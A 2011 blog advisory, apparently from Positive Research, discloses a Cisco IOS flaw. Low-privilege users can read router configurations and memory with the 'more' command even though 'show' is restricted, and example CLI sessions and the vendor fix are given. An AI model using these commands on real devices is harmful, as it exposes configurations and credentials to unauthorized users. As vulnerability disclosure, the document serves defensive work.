Pages

Tuesday, July 12, 2011

More Cisco, "more" vulnerability

Positive Research has discovered a vulnerability in Cisco devices. The vulnerability allows attackers to bypass certain access restrictions.
A possible security flaw was detected because of privileged command restrictions, in particular – "more" command that allows attackers to obtain router configuration stored in nvram, system (RAM), flash elements.
If more command access settings are configured as privilege exec level {number} more, opposed to commands like show, disk element access is propagated to all lower levels that could allow unauthorized users to obtain router memory and its elements nvram, system (RAM), flash.
Such problems are detected for IOS routers and switchers 12.2, 12.3, 12.4, 15.0.

Details

IOS 12.2, 12.3 limit access to configuration that can be obtained from system:running-config, but prevent reading directly from router memory (system:memory) to get the data, also reading from configuration and other files in router’s flash and nvram can is not limited.
IOS 12.4, 15.0 opposed to versions 12.2, 12.3, do not limit access from all router’s elements nvram, system (RAM), flash.
More details and how to fix are available here: http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtk17827


Example 1. How to get configuration
Cisco 3550-12T (12.2(50)SE)
C3550 Software (C3550-IPSERVICESK9-M), Version 12.2(50)SE)


Device configuration:

!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!

!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end


"show" command (low level privileges):

C3550#show running-config
            ^
% Invalid input detected at '^' marker.

C3550#show startup-config
              ^
% Invalid input detected at '^' marker.


"more" command (low level privileges):

C3550#more flash:config.text
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
enable secret 5
!
username ptuser privilege 3 password 7
aaa new-model

!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end


So in spite the fact that device configuration access via show command is restricted, an attacker can get the configuration via "more" command.

Example 2


C3550#more nvram:startup-config
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname C3550
!
enable secret 5
!
username ptuser privilege 3 password 7
aaa new-model

!
snmp-server community RO
!
control-plane
!
privilege exec level 8 access-template
privilege exec level 8 clear access-template
privilege exec level 8 clear
privilege exec level 3 more
privilege exec level 3 show
!
line con 0
line vty 5 15
!
end



C3550#more system:?
system:default-running-config  system:memory  system:running-config
system:vfiles
C3550#more system:running-config
00000000:  0A210A21 0A210A21 0A210A21 0A656E64    .!.! .!.! .!.! .end
00000010:  0AXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX    .XXX XXXX XXXX XXXX



Example 3. Device memory

An attacker can read Cisco device memory, get history and configurations via «more system:memory/main» command.

Commands history (including passwords)

How to get configuration via memory

HTF
Install the version that is not vulnerable.
Details are available here: http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtk17827

Vulnerability discovered by: Sergey Pavlov, Roman Ilin (Positive Research Center)


2 comments: